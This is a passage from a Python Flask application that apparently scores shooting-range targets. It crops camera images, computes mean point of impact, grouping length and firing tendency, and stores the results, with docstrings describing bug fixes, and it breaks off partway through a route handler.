    BUG FIX: srcfile pointed at 'E:/FRAS_production/...' while the crop
    pipeline and save_image_1/2 use 'E:/FRAS Windows/FRAS_production/...';
    the copy could never find the dump file. Path made consistent.
    """
    srcfile = 'E:/FRAS Windows/FRAS_production/static/img_dump/7.png'
    dstdir = 'E:/FRAS Windows/FRAS_production/static/image_db'
    shutil.copy(srcfile, dstdir)
    stamp = time.strftime("%Y_%m_%d_%H_%M")
    newfilename = str(firer_id) + "_" + stamp + ".png"
    old_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", "7.png")
    new_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", newfilename)
    os.rename(old_file, new_file)
    return newfilename
def save_image_8(firer_id):
    """Archive the rendered image for target 8 under a per-firer name.

    BUG FIX: srcfile pointed at 'E:/FRAS_production/...' while the crop
    pipeline and save_image_1/2 use 'E:/FRAS Windows/FRAS_production/...';
    the copy could never find the dump file. Path made consistent.
    """
    srcfile = 'E:/FRAS Windows/FRAS_production/static/img_dump/8.png'
    dstdir = 'E:/FRAS Windows/FRAS_production/static/image_db'
    shutil.copy(srcfile, dstdir)
    stamp = time.strftime("%Y_%m_%d_%H_%M")
    newfilename = str(firer_id) + "_" + stamp + ".png"
    old_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", "8.png")
    new_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", newfilename)
    os.rename(old_file, new_file)
    return newfilename
def savempi_db(detail_no, target_no, paper_no, firer_id, firt_x, firt_y,
               tendency, session_id, set_no, tend_f, tend_f_x, tend_f_y,
               tend_f_x_1, tend_f_y_1, f):
    """Insert one MPI (mean point of impact) row for a paper.

    The original duplicated the whole MPI(...) construction across three
    branches; the per-branch field values are now computed up front and a
    single row is built. Branch semantics preserved exactly:
    * firt_x == 0 (no detected MPI): -1 sentinels for detected values,
      session-edited values stored as the finals;
    * tend_f_x_1 is None (no edited MPI): detected values double as the
      finals and `f` doubles as both tendency text and code;
    * both present: detected values plus the edited finals.

    Returns True on success; redirects to the error page on any failure.
    """
    try:
        if firt_x == 0:
            mpi_x, mpi_y = -1, -1
            f_mpi_x, f_mpi_y = tend_f_x_1, tend_f_y_1
            tend_val = -1
            tend_final = int(tend_f)
            tend_text, tend_code = tend_f_x, tend_f_y
        elif tend_f_x_1 is None:
            mpi_x, mpi_y = firt_x[0], firt_y[0]
            f_mpi_x, f_mpi_y = firt_x[0], firt_y[0]
            tend_val = int(tendency)
            tend_final = int(tendency)
            tend_text, tend_code = f, f
        else:
            mpi_x, mpi_y = firt_x[0], firt_y[0]
            f_mpi_x, f_mpi_y = tend_f_x_1, tend_f_y_1
            # NOTE: stored without int() in this branch originally -- kept.
            tend_val = tendency
            tend_final = int(tend_f)
            tend_text, tend_code = tend_f_x, tend_f_y
        mpi = MPI(
            date=time.strftime("%Y-%m-%d"),
            datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
            session_id=session_id,
            detail_no=detail_no,
            target_no=target_no,
            spell_no=set_no,
            paper_ref=paper_no,
            firer_id=firer_id,
            mpi_x=mpi_x,
            mpi_y=mpi_y,
            f_mpi_x=f_mpi_x,
            f_mpi_y=f_mpi_y,
            tendency=tend_val,
            tendency_f=tend_final,
            tendency_text=tend_text,
            tendency_code=tend_code
        )
        db.session.add(mpi)
        db.session.commit()
    except Exception:
        return redirect(url_for('error_6'))
    return True
def savegp_db(firer_id, session_id, detail_no, target_no, set_no, paper_no,
              gp_l, gp_f, result, result_p):
    """Insert one Grouping row for a paper.

    The original duplicated the whole Grouping(...) construction across
    three branches; the per-branch values are now computed up front.
    Branch semantics preserved exactly:
    * gp_l == "" (no detected grouping): -1 sentinel plus the edited
      length and result;
    * gp_f is None (no edited grouping): detected length doubles as the
      final and the predicted result `result_p` is stored;
    * both present: detected length, edited final, edited result.

    Returns True on success; redirects to the error page on any failure.
    """
    try:
        if gp_l == "":
            length, length_final, res = -1, gp_f, result
        elif gp_f is None:
            length, length_final, res = gp_l, gp_l, result_p
        else:
            length, length_final, res = gp_l, gp_f, result
        gp = Grouping(
            date=time.strftime("%Y-%m-%d"),
            datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
            session_id=session_id,
            detail_no=detail_no,
            target_no=target_no,
            spell_no=set_no,
            paper_ref=paper_no,
            firer_id=firer_id,
            grouping_length=length,
            grouping_length_f=length_final,
            result=res
        )
        db.session.add(gp)
        db.session.commit()
    except Exception:
        return redirect(url_for('error_6'))
    return True
@app.errorhandler(500)
def internal_error(error):
    """Render the generic 500 page for unhandled server errors."""
    return render_template('errors/500.html'), 500
@app.errorhandler(404)
def not_found_error(error):
    """Render the 404 page for unknown URLs."""
    return render_template('errors/404.html'), 404
# The routes below are static error pages that other views redirect to
# (e.g. the save_* helpers redirect to /error_6/ on a database failure).
@app.route('/duplicate_firer_error/')
def duplicate_firer_error():
    """Static error page: errors/duplicate.html."""
    return render_template('errors/duplicate.html')
@app.route('/paper_duplicate/')
def paper_duplicate_error():
    """Static error page: errors/paper_dup.html."""
    return render_template('errors/paper_dup.html')
@app.route('/error_duplicate/')
def error_duplicate():
    """Static error page: errors/error_duplicate.html."""
    return render_template('errors/error_duplicate.html')
@app.route('/error/')
def error():
    """Static error page: errors/error_505.html."""
    return render_template('errors/error_505.html')
@app.route('/error_2/')
def error_2():
    """Static error page: errors/error2_505.html."""
    return render_template('errors/error2_505.html')
@app.route('/error_102/')
def error_102():
    """Static error page: errors/error_102.html."""
    return render_template('errors/error_102.html')
@app.route('/error_31/')
def error_31():
    """Static error page: errors/error31.html."""
    return render_template('errors/error31.html')
@app.route('/error_target_1/')
def error_target_1():
    """Static error page: errors/error_target_1.html."""
    return render_template('errors/error_target_1.html')
@app.route('/error_3/')
def error_3():
    """Static error page: errors/error3_505.html."""
    return render_template('errors/error3_505.html')
@app.route('/error_4/')
def error_4():
    """Static error page: errors/error4_505.html."""
    return render_template('errors/error4_505.html')
@app.route('/error_5/')
def error_5():
    """Static error page: errors/error5_505.html."""
    return render_template('errors/error5_505.html')
@app.route('/error_6/')
def error_6():
    """Static error page: errors/error6_505.html (DB-failure target)."""
    return render_template('errors/error6_505.html')
@app.route('/error_7/')
def error_7():
    """Static error page: errors/error7_505.html."""
    return render_template('errors/error7_505.html')
def making_array_del(x, y, l):
    """Flatten the edited-point columns ([[v], ...]) and pad to length `l`.

    Missing entries are filled with -1 placeholders.
    """
    flat_x = [x[i][0] for i in range(len(x))]
    flat_y = [y[i][0] for i in range(len(x))]
    shortfall = l - len(x)
    flat_x.extend([-1] * shortfall)
    flat_y.extend([-1] * shortfall)
    return flat_x, flat_y
def making_array_add(x, y, l):
    """Copy the detected-point lists and pad both with -1 up to length `l`."""
    padded_x = [x[i] for i in range(len(x))]
    padded_y = [y[i] for i in range(len(x))]
    shortfall = l - len(x)
    padded_x.extend([-1] * shortfall)
    padded_y.extend([-1] * shortfall)
    return padded_x, padded_y
def firing_tendancy(origin_x, origin_y, x, y):
    """Return (rounded "angle" in degrees, x offset in inches, y offset in inches)
    of point (x, y) relative to the target origin.

    NOTE(review): `theta = math.degrees(y_dis/h)` converts the *ratio*
    y_dis/h from radians to degrees; a true angle would need
    `math.degrees(math.asin(y_dis/h))`. Looks like a bug, but stored
    tendency data already depends on these values -- left untouched,
    confirm before changing.
    NOTE(review): h == 0 (shot exactly at the origin) raises
    ZeroDivisionError here -- TODO confirm callers never pass that.
    """
    print("x,y", file=sys.stderr)
    print(x, y, file=sys.stderr)
    x1 = origin_x - x
    y1 = origin_y - y
    xfirt = None
    yfirt = None
    deg = 0
    # Distance of the point from the origin (pixels).
    h = math.sqrt(x1 ** 2 + y1 ** 2)
    x_dis = x - origin_x
    y_dis = y - origin_y
    theta = math.degrees(y_dis / h)
    if (x_dis > 0 and y_dis < 0):
        # Below-right of the origin.
        deg = 360 - theta
        xfirt = pixeltoinch(x_dis)
        yfirt = pixeltoinch(y_dis)
    elif (x_dis < 0 and y_dis < 0):
        # Below-left of the origin.
        deg = 270 - theta
        xfirt = pixeltoinch(x_dis)
        yfirt = pixeltoinch(y_dis)
    elif (x_dis < 0 and y_dis > 0):
        # Above-left of the origin.
        deg = 180 - theta
        xfirt = pixeltoinch(x_dis)
        yfirt = pixeltoinch(y_dis)
    else:
        # Above-right of the origin, or on an axis.
        deg = theta
        xfirt = pixeltoinch(x_dis)
        yfirt = pixeltoinch(y_dis)
    print("Sending xfirt....", file=sys.stderr)
    print(xfirt, file=sys.stderr)
    print(yfirt, file=sys.stderr)
    return (np.round(deg, 0), xfirt, yfirt)
def getfiringtendencytext(f1, firt_x, firt_y):
    """Build the human-readable tendency text and its short code.

    `firt_x`/`firt_y` are the MPI offsets in inches. Anything within
    +/-4.5 inches of centre on both axes counts as a bullseye ("Center").
    `f1` is accepted for call compatibility but never read.
    Returns (text, code), e.g. ("Top(5) Right(10)", "TR").
    """
    print("Receiving xfirt....", file=sys.stderr)
    print(firt_x, file=sys.stderr)
    print(firt_y, file=sys.stderr)
    # Vertical half from the y offset, horizontal half from the x offset.
    if firt_y >= 0:
        vert, vert_code = "Top", "T"
    else:
        vert, vert_code = "Bottom", "B"
    if firt_x >= 0:
        horiz, horiz_code = "Right", "R"
    else:
        horiz, horiz_code = "Left", "L"
    if abs(firt_x) <= 4.5 and abs(firt_y) <= 4.5:
        ftcode = "Center"
        fttext = f"Center ({firt_y} , {firt_x})"
    else:
        ftcode = vert_code + horiz_code
        fttext = f"{vert}({firt_y}) {horiz}({firt_x})"
    return fttext, ftcode
def grouping_length(xt, yt, x, y):
    """Return the grouping size in inches: the largest pairwise distance
    between the shots in `x`/`y`.

    `xt`/`yt` are unused, kept for call compatibility. Returns 0.0 for
    fewer than two shots, matching the original.

    The original built a dict of all n*n distances only to scan it for
    the maximum; this version tracks the maximum directly over the
    unordered pairs (distance is symmetric, self-distance is 0).
    """
    maxdist = 0
    for i in range(len(x)):
        for j in range(i + 1, len(x)):
            d = distance(x[j], y[j], x[i], y[i])
            if maxdist < d:
                maxdist = d
    return pixeltoinch(maxdist)
def distance(x1, y1, x, y):
    """Euclidean distance between points (x1, y1) and (x, y)."""
    dx = x1 - x
    dy = y1 - y
    return math.sqrt(dx ** 2 + dy ** 2)
def pixeltoinch(maxdist):
    """Convert a pixel distance to inches (2000 px spans 34 inches),
    rounded to one decimal place."""
    scale = 34 / 2000 * 1.0
    return np.round(scale * maxdist, 1)
def getresulttext(gpinch):
    """Classify a grouping length in inches: 10 or under passes ("Pass"),
    anything larger is washed out ("W/O")."""
    print(type(gpinch), file=sys.stderr)
    print(gpinch, file=sys.stderr)
    return "Pass" if gpinch <= 10 else "W/O"
@app.route('/previous_page_edit_1/')
def previous_page_edit_1():
    """Render the post-edit landing page pages/image_edit_previous_1.html
    (redirect target of the crop/calibration views for targets 1-4)."""
    return render_template('pages/image_edit_previous_1.html')
@app.route('/previous_page_edit_5/')
def previous_page_edit_5():
    """Render the post-edit landing page pages/image_edit_previous_5.html."""
    return render_template('pages/image_edit_previous_5.html')
@app.route('/crop_data_1', methods=['GET', 'POST'])
def crop_data_1():
    """Crop the raw camera image for target 1 from the four corner points
    posted by the UI, save the normalised 2000x2000 target image, and
    upsert the crop rectangle into the Crop table for recalibration.

    Replaces the original's manual min/max scans and query-then-branch
    upsert; corner selection semantics are unchanged.
    """
    img = Image.open("E:/FRAS Windows/FRAS_production/static/raw_image/CAMERA1_1.JPG")
    if request.method == "POST":
        data = request.get_json()
        points = [data['data1'][0], data['data2'][0],
                  data['data3'][0], data['data4'][0]]
        # Of the two leftmost points, the upper one is the top-left corner.
        left1 = min(points, key=lambda pt: pt[0])
        others = [pt for pt in points if pt[0] != left1[0] and pt[1] != left1[1]]
        left2 = min(others, key=lambda pt: pt[0])
        left = left1 if left1[1] > left2[1] else left2
        # Of the two rightmost points, the lower one is the bottom-right corner.
        right1 = max(points, key=lambda pt: pt[0])
        others = [pt for pt in points if pt[0] != right1[0] and pt[1] != right1[1]]
        right2 = max(others, key=lambda pt: pt[0])
        right = right1 if right1[1] < right2[1] else right2
        # UI origin is bottom-left; flip y for PIL (top-left origin) and
        # clamp to the sensor. The +80 / +50 offsets are empirical
        # adjustments carried over from the original -- TODO confirm.
        x1 = min(int(left[0]), 5470) + 50
        y1 = max(int(3648.0 - left[1]), 0) + 50
        x2 = min(int(right[0]) + 80, 5470) + 50
        y2 = max(int(3648.0 - right[1]), 0) + 50
        img2 = img.crop((x1, y1, x2, y2))
        resize_image = img2.resize((2000, 2000), Image.ANTIALIAS)
        resize_image.save('E:/FRAS Windows/FRAS_production/static/img_dump/1.jpg', 'JPEG')
        image_png = Image.open('E:/FRAS Windows/FRAS_production/static/img_dump/1.jpg')
        image_png.save('E:/FRAS Windows/FRAS_production/static/img_dump/1.png')
        # Upsert: drop any previous rectangle for target 1, then insert.
        db.session.query(Crop).filter(Crop.target_no == 1).delete()
        db.session.commit()
        crop = Crop(target_no=1, x1=x1, y1=y1, x2=x2, y2=y2)
        db.session.add(crop)
        db.session.commit()
    return redirect(url_for('previous_page_edit_1'))
@app.route('/calibration_1', methods=['GET', 'POST'])
def calibration_1():
    """Re-crop target 1's raw image using the rectangle stored in Crop
    and refresh the 2000x2000 jpg/png working copies."""
    data = db.session.query(Crop).filter_by(target_no=1).scalar()
    print(data.target_no, file=sys.stderr)
    print(data.x1, file=sys.stderr)
    box = (data.x1, data.y1, data.x2, data.y2)
    img = Image.open('E:/FRAS Windows/FRAS_production/static/raw_image/CAMERA1_1.JPG')
    resized = img.crop(box).resize((2000, 2000), Image.ANTIALIAS)
    resized.save('E:/FRAS Windows/FRAS_production/static/img_dump/1.jpg', 'JPEG')
    working_copy = Image.open("E:/FRAS Windows/FRAS_production/static/img_dump/1.jpg")
    working_copy.save("E:/FRAS Windows/FRAS_production/static/img_dump/1.png")
    return redirect(url_for('previous_page_edit_1'))
@app.route('/calibration_2', methods=['GET', 'POST'])
def calibration_2():
    """Re-crop target 2's raw image using the rectangle stored in Crop
    and refresh the 2000x2000 jpg/png working copies.

    BUG FIX: the PNG was saved as 'img_dump/2png' (missing dot), so the
    '2.png' file the rest of the pipeline reads was never refreshed.
    """
    data = db.session.query(Crop).filter_by(target_no=2).scalar()
    print(data.target_no, file=sys.stderr)
    print(data.x1, file=sys.stderr)
    box = (data.x1, data.y1, data.x2, data.y2)
    img = Image.open('E:/FRAS Windows/FRAS_production/static/raw_image/CAMERA2_2.JPG')
    resized = img.crop(box).resize((2000, 2000), Image.ANTIALIAS)
    resized.save('E:/FRAS Windows/FRAS_production/static/img_dump/2.jpg', 'JPEG')
    working_copy = Image.open("E:/FRAS Windows/FRAS_production/static/img_dump/2.jpg")
    working_copy.save("E:/FRAS Windows/FRAS_production/static/img_dump/2.png")
    return redirect(url_for('previous_page_edit_1'))
@app.route('/crop_data_2', methods=['GET', 'POST'])
def crop_data_2():
    """Crop the raw camera image for target 2 from the four corner points
    posted by the UI, save the normalised 2000x2000 target image, and
    upsert the crop rectangle into the Crop table for recalibration.

    BUG FIX: the upsert queried and deleted `Crop.target_no == 1` while
    inserting target 2's rectangle, clobbering target 1's calibration
    and accumulating duplicate rows for target 2; it now uses target 2.
    """
    img = Image.open("E:/FRAS Windows/FRAS_production/static/raw_image/CAMERA2_2.JPG")
    if request.method == "POST":
        data = request.get_json()
        points = [data['data1'][0], data['data2'][0],
                  data['data3'][0], data['data4'][0]]
        # Of the two leftmost points, the upper one is the top-left corner.
        left1 = min(points, key=lambda pt: pt[0])
        others = [pt for pt in points if pt[0] != left1[0] and pt[1] != left1[1]]
        left2 = min(others, key=lambda pt: pt[0])
        left = left1 if left1[1] > left2[1] else left2
        # Of the two rightmost points, the lower one is the bottom-right corner.
        right1 = max(points, key=lambda pt: pt[0])
        others = [pt for pt in points if pt[0] != right1[0] and pt[1] != right1[1]]
        right2 = max(others, key=lambda pt: pt[0])
        right = right1 if right1[1] < right2[1] else right2
        # UI origin is bottom-left; flip y for PIL (top-left origin) and
        # clamp to the sensor. The +80 / +50 offsets are empirical
        # adjustments carried over from the original -- TODO confirm.
        x1 = min(int(left[0]), 5470) + 50
        y1 = max(int(3648.0 - left[1]), 0) + 50
        x2 = min(int(right[0]) + 80, 5470) + 50
        y2 = max(int(3648.0 - right[1]), 0) + 50
        img2 = img.crop((x1, y1, x2, y2))
        resize_image = img2.resize((2000, 2000), Image.ANTIALIAS)
        resize_image.save('E:/FRAS Windows/FRAS_production/static/img_dump/2.jpg', 'JPEG')
        image_png = Image.open('E:/FRAS Windows/FRAS_production/static/img_dump/2.jpg')
        image_png.save('E:/FRAS Windows/FRAS_production/static/img_dump/2.png')
        # Upsert: drop any previous rectangle for target 2, then insert.
        db.session.query(Crop).filter(Crop.target_no == 2).delete()
        db.session.commit()
        crop = Crop(target_no=2, x1=x1, y1=y1, x2=x2, y2=y2)
        db.session.add(crop)
        db.session.commit()
    return redirect(url_for('previous_page_edit_1'))
@app.route('/crop_data_3', methods=['GET', 'POST'])
def crop_data_3():
    """Crop the raw camera image for target 3 from the four corner points
    posted by the UI and save the normalised 2000x2000 target image.

    Replaces the original's manual min/max scans; corner selection
    semantics are unchanged, and GET now gets an explicit redirect
    instead of falling through.
    """
    img = Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/raw_image/CAMERA3_3.JPG")
    if request.method == "POST":
        data = request.get_json()
        points = [data['data1'][0], data['data2'][0],
                  data['data3'][0], data['data4'][0]]
        # Of the two leftmost points, the upper one is the top-left corner.
        left1 = min(points, key=lambda pt: pt[0])
        others = [pt for pt in points if pt[0] != left1[0] and pt[1] != left1[1]]
        left2 = min(others, key=lambda pt: pt[0])
        left = left1 if left1[1] > left2[1] else left2
        # Of the two rightmost points, the lower one is the bottom-right corner.
        right1 = max(points, key=lambda pt: pt[0])
        others = [pt for pt in points if pt[0] != right1[0] and pt[1] != right1[1]]
        right2 = max(others, key=lambda pt: pt[0])
        right = right1 if right1[1] < right2[1] else right2
        # UI origin is bottom-left; flip y for PIL (top-left origin) and
        # clamp to the sensor. +80 widens the right edge (empirical
        # margin carried over from the original -- TODO confirm).
        x1 = min(int(left[0]), 5470)
        y1 = max(int(3648.0 - left[1]), 0)
        x2 = min(int(right[0]) + 80, 5470)
        y2 = max(int(3648.0 - right[1]), 0)
        img2 = img.crop((x1, y1, x2, y2))
        resize_image = img2.resize((2000, 2000), Image.ANTIALIAS)
        resize_image.save('/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/3.jpg', 'JPEG')
        image_png = Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/3.jpg")
        image_png.save("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/3.png")
    return redirect(url_for('previous_page_edit_1'))
@app.route('/crop_data_4', methods=['GET', 'POST'])
def crop_data_4():
    """Crop the raw camera image for target 4 from the four corner points
    posted by the UI and save the normalised 2000x2000 target image.

    Replaces the original's manual min/max scans; corner selection
    semantics are unchanged, and GET now gets an explicit redirect
    instead of falling through.
    """
    img = Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/raw_image/CAMERA4_4.JPG")
    if request.method == "POST":
        data = request.get_json()
        points = [data['data1'][0], data['data2'][0],
                  data['data3'][0], data['data4'][0]]
        # Of the two leftmost points, the upper one is the top-left corner.
        left1 = min(points, key=lambda pt: pt[0])
        others = [pt for pt in points if pt[0] != left1[0] and pt[1] != left1[1]]
        left2 = min(others, key=lambda pt: pt[0])
        left = left1 if left1[1] > left2[1] else left2
        # Of the two rightmost points, the lower one is the bottom-right corner.
        right1 = max(points, key=lambda pt: pt[0])
        others = [pt for pt in points if pt[0] != right1[0] and pt[1] != right1[1]]
        right2 = max(others, key=lambda pt: pt[0])
        right = right1 if right1[1] < right2[1] else right2
        # UI origin is bottom-left; flip y for PIL (top-left origin) and
        # clamp to the sensor. +80 widens the right edge (empirical
        # margin carried over from the original -- TODO confirm).
        x1 = min(int(left[0]), 5470)
        y1 = max(int(3648.0 - left[1]), 0)
        x2 = min(int(right[0]) + 80, 5470)
        y2 = max(int(3648.0 - right[1]), 0)
        img2 = img.crop((x1, y1, x2, y2))
        resize_image = img2.resize((2000, 2000), Image.ANTIALIAS)
        resize_image.save('/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/4.jpg', 'JPEG')
        image_png = Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/4.jpg")
        image_png.save("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/4.png")
    return redirect(url_for('previous_page_edit_1'))
@app.route('/crop_data_5', methods=['GET', 'POST'])
def crop_data_5():
    """Crop the raw camera image for target 5 from the four corner points
    posted by the UI and save the normalised 2000x2000 target image.

    Replaces the original's manual min/max scans; corner selection
    semantics are unchanged, and GET now gets an explicit redirect
    instead of falling through.
    """
    img = Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/raw_image/CAMERA5_5.JPG")
    if request.method == "POST":
        data = request.get_json()
        points = [data['data1'][0], data['data2'][0],
                  data['data3'][0], data['data4'][0]]
        # Of the two leftmost points, the upper one is the top-left corner.
        left1 = min(points, key=lambda pt: pt[0])
        others = [pt for pt in points if pt[0] != left1[0] and pt[1] != left1[1]]
        left2 = min(others, key=lambda pt: pt[0])
        left = left1 if left1[1] > left2[1] else left2
        # Of the two rightmost points, the lower one is the bottom-right corner.
        right1 = max(points, key=lambda pt: pt[0])
        others = [pt for pt in points if pt[0] != right1[0] and pt[1] != right1[1]]
        right2 = max(others, key=lambda pt: pt[0])
        right = right1 if right1[1] < right2[1] else right2
        # UI origin is bottom-left; flip y for PIL (top-left origin) and
        # clamp to the sensor. +80 widens the right edge (empirical
        # margin carried over from the original -- TODO confirm).
        x1 = min(int(left[0]), 5470)
        y1 = max(int(3648.0 - left[1]), 0)
        x2 = min(int(right[0]) + 80, 5470)
        y2 = max(int(3648.0 - right[1]), 0)
        img2 = img.crop((x1, y1, x2, y2))
        resize_image = img2.resize((2000, 2000), Image.ANTIALIAS)
        resize_image.save('/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/5.jpg', 'JPEG')
        image_png = Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/5.jpg")
        image_png.save("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/5.png")
    return redirect(url_for('previous_page_edit_2'))
@app.route('/crop_data_6', methods=['GET', 'POST'])
def crop_data_6():
    """Crop the raw camera image for target 6 from the four corner points
    posted by the UI and save the normalised 2000x2000 target image.

    Replaces the original's manual min/max scans; corner selection
    semantics are unchanged, and GET now gets an explicit redirect
    instead of falling through.
    """
    img = Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/raw_image/CAMERA6_6.JPG")
    if request.method == "POST":
        data = request.get_json()
        points = [data['data1'][0], data['data2'][0],
                  data['data3'][0], data['data4'][0]]
        # Of the two leftmost points, the upper one is the top-left corner.
        left1 = min(points, key=lambda pt: pt[0])
        others = [pt for pt in points if pt[0] != left1[0] and pt[1] != left1[1]]
        left2 = min(others, key=lambda pt: pt[0])
        left = left1 if left1[1] > left2[1] else left2
        # Of the two rightmost points, the lower one is the bottom-right corner.
        right1 = max(points, key=lambda pt: pt[0])
        others = [pt for pt in points if pt[0] != right1[0] and pt[1] != right1[1]]
        right2 = max(others, key=lambda pt: pt[0])
        right = right1 if right1[1] < right2[1] else right2
        # UI origin is bottom-left; flip y for PIL (top-left origin) and
        # clamp to the sensor. +80 widens the right edge (empirical
        # margin carried over from the original -- TODO confirm).
        x1 = min(int(left[0]), 5470)
        y1 = max(int(3648.0 - left[1]), 0)
        x2 = min(int(right[0]) + 80, 5470)
        y2 = max(int(3648.0 - right[1]), 0)
        img2 = img.crop((x1, y1, x2, y2))
        resize_image = img2.resize((2000, 2000), Image.ANTIALIAS)
        resize_image.save('/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/6.jpg', 'JPEG')
        image_png = Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/6.jpg")
        image_png.save("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/6.png")
    return redirect(url_for('previous_page_edit_2'))
@app.route('/crop_data_7', methods=['GET', 'POST'])
def crop_data_7():
    """Crop the raw camera-7 capture to the quadrilateral posted by the client.

    POST body (JSON): keys 'data1'..'data4', each a list whose first element
    is an (x, y) corner point; y is measured upward from the paper bottom,
    hence the ``3648 - y`` flip below (3648 appears to be the sensor height,
    5470 the sensor width -- TODO confirm against the camera spec).
    The crop is resized to 2000x2000 and written to static/img_dump as both
    7.jpg and 7.png, then the browser is redirected to the edit page.
    """
    img = Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/raw_image/CAMERA7_7.JPG")
    if request.method == "POST":
        data = request.get_json()
        points = [data['data1'][0], data['data2'][0],
                  data['data3'][0], data['data4'][0]]
        print(points, file=sys.stderr)
        # Order the four corners by x: the two smallest form the left edge,
        # the two largest the right edge.
        # BUG FIX: the original removed the chosen extreme point with
        # "p[0]!=chosen[0] and p[1]!=chosen[1]", which also discards any
        # corner sharing just ONE coordinate with it (always the case for an
        # axis-aligned rectangle), so the "second leftmost/rightmost" point
        # was really the diagonally opposite corner.
        by_x = sorted(points, key=lambda p: p[0])
        left1, left2 = by_x[0], by_x[1]
        right2, right1 = by_x[2], by_x[3]
        # Original selection rule: of the two leftmost corners keep the one
        # with the larger y; of the two rightmost keep the smaller y.
        left = left1 if left1[1] > left2[1] else left2
        right = right1 if right1[1] < right2[1] else right2
        print("left,right", left, right, file=sys.stderr)
        x1 = min(int(left[0]), 5470)           # clamp to sensor width
        y1 = max(int(3648.0 - left[1]), 0)     # flip y, clamp to top edge
        x2 = min(int(right[0]) + 80, 5470)     # +80 px right-hand margin
        y2 = max(int(3648.0 - right[1]), 0)
        print("x1,y1,x2,y2", x1, y1, x2, y2, file=sys.stderr)
        img2 = img.crop((x1, y1, x2, y2))
        # Image.LANCZOS is the filter ANTIALIAS aliased; ANTIALIAS was
        # removed in Pillow 10.
        resize_image = img2.resize((2000, 2000), Image.LANCZOS)
        resize_image.save('/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/7.jpg', 'JPEG')
        image_png = Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/7.jpg")
        image_png.save("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/7.png")
    return redirect(url_for('previous_page_edit_2'))
@app.route('/crop_data_8', methods=['GET', 'POST'])
def crop_data_8():
    """Crop the raw camera-8 capture to the quadrilateral posted by the client.

    POST body (JSON): keys 'data1'..'data4', each a list whose first element
    is an (x, y) corner point; y is measured upward from the paper bottom,
    hence the ``3648 - y`` flip below (3648 appears to be the sensor height,
    5470 the sensor width -- TODO confirm against the camera spec).
    The crop is resized to 2000x2000 and written to static/img_dump as both
    8.jpg and 8.png, then the browser is redirected to the edit page.
    """
    img = Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/raw_image/CAMERA8_8.JPG")
    if request.method == "POST":
        data = request.get_json()
        points = [data['data1'][0], data['data2'][0],
                  data['data3'][0], data['data4'][0]]
        print(points, file=sys.stderr)
        # Order the four corners by x: the two smallest form the left edge,
        # the two largest the right edge.
        # BUG FIX: the original removed the chosen extreme point with
        # "p[0]!=chosen[0] and p[1]!=chosen[1]", which also discards any
        # corner sharing just ONE coordinate with it (always the case for an
        # axis-aligned rectangle), so the "second leftmost/rightmost" point
        # was really the diagonally opposite corner.
        by_x = sorted(points, key=lambda p: p[0])
        left1, left2 = by_x[0], by_x[1]
        right2, right1 = by_x[2], by_x[3]
        # Original selection rule: of the two leftmost corners keep the one
        # with the larger y; of the two rightmost keep the smaller y.
        left = left1 if left1[1] > left2[1] else left2
        right = right1 if right1[1] < right2[1] else right2
        print("left,right", left, right, file=sys.stderr)
        x1 = min(int(left[0]), 5470)           # clamp to sensor width
        y1 = max(int(3648.0 - left[1]), 0)     # flip y, clamp to top edge
        x2 = min(int(right[0]) + 80, 5470)     # +80 px right-hand margin
        y2 = max(int(3648.0 - right[1]), 0)
        print("x1,y1,x2,y2", x1, y1, x2, y2, file=sys.stderr)
        img2 = img.crop((x1, y1, x2, y2))
        # Image.LANCZOS is the filter ANTIALIAS aliased; ANTIALIAS was
        # removed in Pillow 10.
        resize_image = img2.resize((2000, 2000), Image.LANCZOS)
        resize_image.save('/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/8.jpg', 'JPEG')
        image_png = Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/8.jpg")
        image_png.save("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/8.png")
    return redirect(url_for('previous_page_edit_2'))
@app.route('/test', methods=['GET', 'POST'])
def update():
    """Recompute MPI, grouping length and firing tendency for target 1.

    POST body (JSON): 'x1' and 'y1' are lists of single-element lists with
    the shot coordinates; 'points' feeds mpi().  Computed values are cached
    in the session (keys tmpi, x1, y1, tf_u_1, gp_u_1, res_u_1, tfirer_*)
    and returned as JSON for the edit page.  On GET, returns the same JSON
    shape with empty/None placeholders.
    """
    gp_1 = 0
    j_x = None
    j_y = None
    up_res_1 = None
    mp_inch = []
    u_fir_tendency_txt = None
    if request.method == "POST":
        data1 = request.get_json()
        x1 = [le[0] for le in data1['x1']]
        y1 = [le[0] for le in data1['y1']]
        points = data1['points']
        # The original computed mpi(1, points) twice; compute once and reuse.
        tmpi = mpi(1, points)
        mp = tmpi.tolist()
        mp_inch = [pixeltoinch(mp[0][0]), pixeltoinch(mp[0][1])]
        session['tmpi'] = mp
        f_1, txf, tyf = firing_tendancy(1000, 1000, tmpi[0][0], tmpi[0][1])
